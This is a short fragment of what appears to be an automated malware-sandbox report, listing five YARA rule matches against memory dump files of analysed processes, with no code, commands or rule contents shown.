Source: Yara match File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY